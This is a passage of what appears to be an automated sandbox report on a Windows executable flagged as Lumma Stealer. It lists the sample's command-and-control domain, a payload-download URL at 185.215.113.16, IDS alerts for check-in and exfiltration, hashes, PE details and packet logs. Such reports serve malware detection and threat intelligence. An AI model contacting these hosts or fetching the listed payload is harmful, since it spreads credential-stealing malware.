                                                  https://crisiwarny.store/v8hsfile.exe, 00000000.00000003.1793207907.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064513836.0000000000700000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759143782.00000000006F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1786059361.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1759468384.00000000006FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://crisiwarny.store/xfile.exe, 00000000.00000003.1793344937.000000000510C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://185.215.113.16/Q=file.exe, 00000000.00000003.2086064735.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://crisiwarny.store:443/apitxtPKfile.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://crisiwarny.store/ufile.exe, 00000000.00000003.1756778602.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1741732815.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742430669.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://presticitpo.store:443/apifile.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://crisiwarny.store/s://crisiwarny.store/apitfile.exe, 00000000.00000003.2064902373.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064714160.00000000006D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016file.exe, 00000000.00000003.1712232842.0000000005147000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1712165908.000000000514E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://crisiwarny.store/apibufile.exe, 00000000.00000003.1793207907.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2064513836.0000000000700000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://www.ecosia.org/newtab/file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.1743350143.000000000521B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://185.215.113.16/file.exe, 00000000.00000003.2086064735.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://185.215.113.16:80/off/def.exefile.exe, 00000000.00000002.2086588158.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://crisiwarny.store/Hfile.exe, 00000000.00000003.1793344937.000000000510C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://support.microsoffile.exe, 00000000.00000003.1712165908.0000000005150000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.1742224060.000000000512B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://crisiwarny.store/api9file.exe, 00000000.00000003.1793004274.0000000005102000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://crisiwarny.store/0file.exe, 00000000.00000002.2089716142.000000000510C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://185.215.113.16/off/def.exefile.exe, 00000000.00000002.2086588158.0000000000672000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086360372.000000000019A000.00000004.00000010.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086064735.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://crisiwarny.store/file.exe, 00000000.00000003.1741732815.0000000000704000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1793344937.000000000510C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2086762508.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2089716142.000000000510C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2085807683.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1711799765.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1781336814.00000000006FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1711943208.00000000006DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesfile.exe, 00000000.00000003.1712232842.0000000005122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.1712394447.0000000005139000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      172.67.170.64
                                                                                      		crisiwarny.storeUnited States
                                                                                      		13335CLOUDFLARENETUStrue
                                                                                      185.215.113.16
                                                                                      		unknownPortugal
                                                                                      		206894WHOLESALECONNECTIONSNLfalse

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1543216
                                                                                      Start date and time:2024-10-27 13:02:07 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 4m 6s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:4
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:file.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/0@4/2
                                                                                      EGA Information:Failed
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      • Number of executed functions: 0
                                                                                      • Number of non-executed functions: 1
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Stop behavior analysis, all processes terminated

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Execution Graph export aborted for target file.exe, PID 7472 because there are no executed function
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: file.exe

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      08:02:59API Interceptor65x Sleep call for process: file.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      172.67.170.64file.exeGet hashmaliciousLummaCBrowse
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                          185.215.113.16file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.215.113.16/off/def.exe
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.215.113.16/off/def.exe
                                                                                                          SecuriteInfo.com.Win32.Evo-gen.20836.29869.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.215.113.16/off/def.exe
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.215.113.16/off/def.exe
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.215.113.16/off/def.exe
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.215.113.16/off/def.exe
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.215.113.16/off/def.exe
                                                                                                          S92Ayq3U9A.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.215.113.16/off/def.exe
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.215.113.16/off/def.exe
                                                                                                          D18h1ni3ZU.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.215.113.16/off/def.exe

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          crisiwarny.storefile.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.95.91
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.95.91
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.95.91
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          nklm68k.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 172.68.224.89
                                                                                                          splarm7.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 141.101.119.135
                                                                                                          nabx86.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 104.21.62.94
                                                                                                          SecuriteInfo.com.Win32.Evo-gen.20836.29869.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 188.114.97.3
                                                                                                          splx86.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 104.27.44.51
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 104.21.95.91
                                                                                                          sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 1.3.103.28
                                                                                                          WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.215.113.16
                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                          • 185.215.113.206
                                                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                                                          • 185.215.113.206
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.215.113.16
                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                          • 185.215.113.206
                                                                                                          SecuriteInfo.com.Win32.Evo-gen.20836.29869.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.215.113.16
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.215.113.16
                                                                                                          file.exeGet hashmaliciousStealcBrowse
                                                                                                          • 185.215.113.206
                                                                                                          file.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                          • 185.215.113.206
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 185.215.113.16

                                                                                                          JA3 Fingerprints

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          SecuriteInfo.com.Win32.Evo-gen.20836.29869.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          https://duy38.r.ag.d.sendibm3.com/mk/cl/f/sh/1t6Af4OiGsF30wT9TF4ckLf3fAzx5z/28D7HenRXzOUGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64
                                                                                                          order confirmation.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                          • 172.67.170.64
                                                                                                          Flech.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 172.67.170.64

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          No created / dropped files found

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                          Entropy (8bit):6.561363833308581
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:file.exe
                                                                                                          File size:2'921'984 bytes
                                                                                                          MD5:5c0022dd6f83870f6a81faf362383ae3
                                                                                                          SHA1:a34e622e2bafbbbc107bb7311681516126838e90
                                                                                                          SHA256:1df402c5bd54c8b600ba43b0c94ff494786617d2276aec771af24202b310ac63
                                                                                                          SHA512:9d21dd922b4d25f46629fff1500b67d37f949cefa43c7c68425fffe6c722b5efed46eb0a2eb45ce58e8180cb870ae5e3b4c2f0408a222fb80be8b892afdea840
                                                                                                          SSDEEP:24576:V7Y+ff17BER73cd+z0v/nDH1vPXTNfHb+1oOT9wvUj82tsGF2gKZ0xL7DVHSv9:VT7KJZwnnb6oTM6GFBKMHE
                                                                                                          TLSH:35D54B62F405F1CBD88B17789127CE826E5E82F9471149C3E86CA47B7EB3CC525B6E24
                                                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J............/...........@.........................../......l-...@.................................T...h..

                                                                                                          File Icon

                                                                                                          Icon Hash:90cececece8e8eb0

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x6fa000
                                                                                                          Entrypoint Section:.taggant
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:6
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:6
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:6
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          jmp 00007FAD40EE42FAh
                                                                                                          pcmpeqb mm5, qword ptr [eax+eax]
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          jmp 00007FAD40EE62F5h
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al
                                                                                                          add byte ptr [eax], al

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x5a1f80x8.idata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          0x10000x580000x27e007af5a303bcea093f74115666b8dec17fFalse0.9979611579153606data7.97730443522952IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rsrc 0x590000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .idata 0x5a0000x10000x200555a11fa24a077379003c187d9c9d020False0.14453125data0.9996515881509258IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          aqmxsaio0x5b0000x29e0000x29e000a47b0967cabd67a248a19faf1cf1a4eeunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          zdfqzxlh0x2f90000x10000x400188c23b44a4e2049b23a8fa49511b7efFalse0.7939453125data6.2184228343254055IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .taggant0x2fa0000x30000x220071dd37e3a2be642bd2044e6b0e8021b3False0.006548713235294118DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          kernel32.dlllstrcpy

                                                                                                          Network Behavior

                                                                                                          Suricata IDS Alerts

                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-10-27T13:03:01.697402+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730172.67.170.64443TCP
                                                                                                          2024-10-27T13:03:01.697402+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730172.67.170.64443TCP
                                                                                                          2024-10-27T13:03:02.892163+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731172.67.170.64443TCP
                                                                                                          2024-10-27T13:03:02.892163+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731172.67.170.64443TCP
                                                                                                          2024-10-27T13:03:09.964365+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449735172.67.170.64443TCP
                                                                                                          2024-10-27T13:03:39.473628+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449701172.67.170.64443TCP
                                                                                                          2024-10-27T13:03:40.380479+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.449702185.215.113.1680TCP

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Oct 27, 2024 13:03:00.438263893 CET49730443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:00.438328028 CET44349730172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:00.438422918 CET49730443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:00.441592932 CET49730443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:00.441625118 CET44349730172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:01.060684919 CET44349730172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:01.060813904 CET49730443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:01.133431911 CET49730443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:01.133469105 CET44349730172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:01.133795977 CET44349730172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:01.177561045 CET49730443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:01.222076893 CET49730443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:01.222116947 CET49730443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:01.222364902 CET44349730172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:01.697134972 CET44349730172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:01.697230101 CET44349730172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:01.697314978 CET49730443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:01.723208904 CET49730443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:01.723248959 CET44349730172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:01.723267078 CET49730443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:01.723273039 CET44349730172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:01.768987894 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:01.769076109 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:01.769200087 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:01.769550085 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:01.769566059 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:02.383454084 CET44349731172.67.170.64192.168.2.4
                                                                                                          Oct 27, 2024 13:03:02.383598089 CET49731443192.168.2.4172.67.170.64
                                                                                                          Oct 27, 2024 13:03:02.397931099 CET49731443192.168.2.4172.67.170.64
